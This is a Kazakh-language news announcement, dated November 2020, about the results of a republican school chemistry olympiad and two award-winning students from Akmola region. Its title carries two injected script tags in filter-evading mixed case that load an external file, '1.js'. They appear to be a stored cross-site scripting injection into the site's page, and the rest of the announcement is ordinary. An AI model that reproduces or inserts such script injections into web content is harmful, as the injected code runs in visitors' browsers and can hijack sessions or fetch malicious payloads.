Қ.Сәтпаев атындағы химия пәні бойынша IV Республикалық олимпиадасының қорытындысы туралы ақпарат.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.11.2020

2020 жылдың 3 қарашасында онлайн режимде Қ.Сәтпаев атындағы химия пәні бойынша IV Республикалық олимпиадасы өткізілді. 

Олимпиаданың негізгі мақсаты – дарынды балаларды анықтау және қолдау, теориялық білім мен практикалық дағдыларды тереңдету, оқушылардың химияны оқуға қызығушылығын арттыру.

Республика бойынша 68 оқушысы қатысты. Ақмола облысынан  Тайшиков Айбек –  Бурабай ауданы, Щучье қаласының №11 ІТ мектеп – лицейінің 9 сынып оқушысы, Тукаев Абылай – Көкшетау қаласы, гуманитарлы-техникалық лицейінің 9 сынып оқушысы, Балсеит Елдана –  Көкшетау қаласы, дарынды балаларға арналған №3 облыстық  мамандандырылған мектеп интернатының 9 сынып оқушысы қатысты. 

Олимпиада қорытындысы бойынша грамотамен Тукаев Абылай – Көкшетау қаласы, гуманитарлы-техникалық лицейінің 9 сынып оқушысы және  Балсеит Елдана –  Көкшетау қаласы, дарынды балаларға арналған №3 облыстық  мамандандырылған мектеп интернатының 9 сынып оқушысы марапатталды.

Жүлдегерлерімізді құттықтаймыз! Әлі талай жетістіктеріңізбен қуанта беріңіздер!

Просмотров: 367


Пікір қосу



Деректерді қолтаңбаға қосу